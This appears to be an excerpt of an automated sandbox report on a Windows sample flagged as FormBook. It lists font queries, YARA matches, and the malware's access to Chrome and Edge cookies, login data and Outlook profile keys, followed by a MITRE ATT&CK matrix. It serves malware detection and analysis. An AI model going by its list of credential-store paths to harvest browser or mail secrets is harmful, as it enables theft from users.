Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2927376877.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2926133034.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2928989323.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2925502750.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2461565241.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2927181346.0000000004380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2463556567.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\RmClient.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2927376877.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2926133034.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2928989323.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2925502750.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2461565241.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2927181346.0000000004380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2463556567.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	512 Process Injection	1 Access Token Manipulation	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
